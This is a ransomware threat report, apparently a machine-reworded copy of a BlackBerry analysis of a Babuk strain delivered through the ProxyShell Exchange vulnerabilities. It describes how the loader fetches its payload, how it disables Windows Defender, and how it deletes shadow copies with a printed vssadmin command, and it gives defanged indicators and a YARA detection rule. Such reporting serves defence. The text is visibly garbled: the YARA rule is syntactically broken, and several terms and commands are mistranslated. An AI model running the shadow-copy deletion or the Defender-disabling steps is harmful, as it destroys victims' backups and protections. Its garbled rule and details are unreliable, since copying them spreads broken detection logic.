Babuk Ransomware Modifies Attack Methods to Double Extortion


First appearing in early 2021, the Babuk ransomware recently made headlines for using the ProxyShell vulnerability of a Microsoft® Exchange server to deploy its malicious ransom payload. This is an attack method that has already been used by ransomware groups such as Conti and LockFile.

The malware mainly targeted Windows® devices by encrypting victim’s files with an AES-256 algorithm. In April 2021, the Babuk Group released a statement that it would change its approach to attack to include double extortion, a technique that becomes increasingly common in 2021, with groups such as REvil deploying it with devastating results. . Double extortion means data is both locally encrypted and exfiltrated before a ransom demand is made, giving the technique the potential to be much more damaging than the traditional ransom note.

Operating system

Risk and impact


Babuk was originally offered as Ransomware-as-a-Service (RaaS), which is a popular way for threat actors to distribute and sell their malicious services through underground forums. However, in July 2021, the files for ransomware maker Babuk were leaked online by one of the original creators. The leak contained the following files, as shown in Figure 1.

Figure 1 – Builder Babuk Files Disclosed by Developer

Since then, the source code has been used by different threat actors to create malicious ransomware payloads. As a result, many different strains of ransomware with properties identical to the original Babuk have appeared in the wild and in online malware repositories.

The leaked source code also contained decryption keys, which have since been used by researchers to create free decryption tools for some of the strains. (NOTE: A decryptor for the variant shown in this report is not yet publicly available.)

Technical analysis

The file analyzed in this report is a relatively new strain, which first appeared in October 2021. To deliver its payload, this release uses ProxyShell, a collection of Microsoft Exchange vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE- 2021-31207) which can be chained to bypass authentication and execute code as a privileged user.

The menacing actor associated with this strain is known as Tortilla. Tortilla is a group first identified in July 2021, and they are widely associated with attacks targeting US-based victims.

The attack chain begins when the initial loader, a .NET executable, is dropped on the targeted server. Inside the file is a base64 encoded PowerShell command as shown below.

Figure 2 – Initial .NET Loader with Obfuscated PowerShell Command

Figure 3 – Decoded PowerShell Script

Once the command is decoded, as shown in Figure 3, it gives an indication of what the initial loader is trying to achieve. The loader invokes a web request to the malicious repository to retrieve and execute the next step in the attack chain.

The malware also performs a Microsoft Anti-Malware Software Interface (ASMI) bypass in order to disable certain features of Windows Defender. It does this by using the “Set-MpPreference” command to disable real-time monitoring, script analysis, behavior monitoring, IOV protection, and intrusion prevention systems.

The main loader of recovered ransomware is also written in .NET framework and disguises itself as Inventory Management System (SMS) as shown in Figure 4. This file is highly obfuscated and contains the malicious payload encrypted inside.

Figure 4 – Main ransomware loader disguised as an inventory management system

The charger creates a TPC connection on port 443 with the IP address 168[.]119[.]93[.]163, as shown in Figure 5. This is done to download a module, which is used to decrypt the malicious payload stored in the main loader file resources shown in Figure 4.

Figure 5 – The TCP connection is created to retrieve the decryption module

The decompressor that is recovered creates a copy of “AddInProcess32.exe” in the “Users / AppData / Local / Temp” directory as shown below. This is used to bypass Windows Defender app mode because it allows a .NET process to be started in suspended mode.

Figure 6 – Duplicate version of AddInProcess32.exe in the Temp directory

Babuk will attempt to tamper with shadow volume snapshots of a victim machine. It is an internal backup technology included in Windows operating systems. Attackers do this to thwart attempts by victims to easily recover encrypted data and avoid having to pay the ransom. The command “C: Windows System32 cmd.exe “/ c vssadmin.exe remove shadows / all / quiet“is executed to perform this action.

The malware creates a mutex called “DoYouWantToHaveS * xWithCuongDong”, as shown in Figure 7. This appears to be a misspelled reference to the security researcher who initially discovered the Babuk ransomware in early 2021.

Figure 7 – Ransomware payload creates the “DoYouWantToHaveS * xWithCuongDong” mutex

The uncompressed Babuk payload is injected into the AddInProcess32.exe process and executed. The malware begins its infection by encrypting files with an AES-256 algorithm. Encrypted files come with a “.babyk” file extension as shown in figure 8. Some file extensions and folders are exempt from this encryption process, in order to avoid damaging essential system files which would alert prematurely a victim of the presence of the threat.

Figure 8 – Files Encrypted with .babyk Extension and Ransom Note

A ransom note called “How to restore your.txt files” is dropped on the desktop as shown above. This notifies the victim that their files have been encrypted and exposes the requests of the threat actors, as shown in Figure 9.

If the victim does not comply, the memo threatens to disclose the sensitive data of the victim. As proof of this intention, it provides a link to a “private” page containing disclosed data. The attacker also provides the victim with a Tor address to access further instructions and functionality to pay the ransom.

Figure 9 – Ransom note informing the victim of an attack


The double extortion technique used by Babuk gives him the potential to cause damage to more people by hitting a single business. For example, if a company encrypts its data but does not exfiltrate it, the damage stops there. If business data is exfiltrated, sensitive information about the business and its employees, customers and partners could be made public, thus extending the damage.

This potential for further reputational damage could cause victims to pay the attacker ransom. The new attack method adopted by Babuk, along with the leak of its source code, means that the threat is likely to play a significant role in the ransomware landscape for the foreseeable future.

YARA rule

The following YARA rule was written by the BlackBerry Research & Intelligence team to detect the threat described in this document:

import “pe”

Babuk_Ransomware rule {
description = “Detects Babuk Ransomware”
author = “BlackBerry Threat Research Team”
date = “2021-11-16”
hash = “752d66990097c8be7760d8d6011b1e91daa1d5518951d86f9fdf3d126d54872a”
license = “This Yara rule is provided under the Apache 2.0 license ( and open to any user or organization, as long as you use it under this license and ensure you as the author credit any derivative to the BlackBerry Research & Intelligence team “

$ s1 = “EfsrTiny”
$ s2 = “SymantecPKI-1-5670”
$ s3 = “EfsPotato”
$ s4 = “Symantec Corporation1”
$ s5 = “ado.exe”
$ s6 = “RpcInterfaceInformation”
$ s7 = “v2.0.50727”

// PE file
uint16 (0) == 0x5a4d and

// Net point
pe.imports (“mscoree.dll”, “_CorExeMain”) and

// PE sections
pe.number_of_sections == 3 and

// The checksum is defined and corresponds
pe.checksum == pe.calculate_checksum () and

// All strings
all of ($ s *))

Indicators of Compromise (IoC)


  • 752d66990097c8be7760d8d6011b1e91daa1d5518951d86f9fdf3d126d54872a


  • http: // fbi[.]bottoms / tortillas / tortillas[.]Exe

IP adress


  • Do you want to have * x with CuongDong


  • CommentRestoreYourFiles.txt ‘
  • Users / AppData / Local / Temp / AddInProcess32.exe
  • .babyk file extension


  • All affected files after encryption

BlackBerry Support

If you’ve been battling this malware or a similar threat, you’ve come to the right place, regardless of your existing BlackBerry relationship.

The BlackBerry Incident Response team is made up of world-class consultants dedicated to managing response and containment services for a wide range of incidents, including ransomware and Advanced Persistent Threat (APT) cases.

We have a global team of consultants on hand to help provide round-the-clock support, if needed, as well as local support. Please contact us here:

The references

Babuk Ransomware Operation – Ransomware is the new trend in cybersecurity

BlackBerry Research and Intelligence Team

About the BlackBerry Research & Intelligence team

The BlackBerry Research & Intelligence team examines emerging and persistent threats, providing intelligence analytics for the benefit of advocates and the organizations they serve.

Comments are closed.